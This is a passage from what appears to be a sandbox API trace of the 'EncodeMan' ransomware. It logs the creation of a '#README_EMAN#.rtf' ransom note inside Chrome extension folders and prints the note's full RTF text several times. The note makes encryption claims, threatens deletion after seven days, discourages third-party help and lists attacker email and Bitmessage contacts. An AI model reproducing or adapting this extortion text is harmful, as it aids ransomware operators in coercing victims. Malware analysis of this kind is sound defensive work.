data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fr_ca\\#readme_eman#.rtf")) returned 0xffffffff [0285.135] GetLastError () returned 0x2 [0285.135] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fr_CA\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fr_ca\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0285.186] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.186] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.186] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f4d648, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd 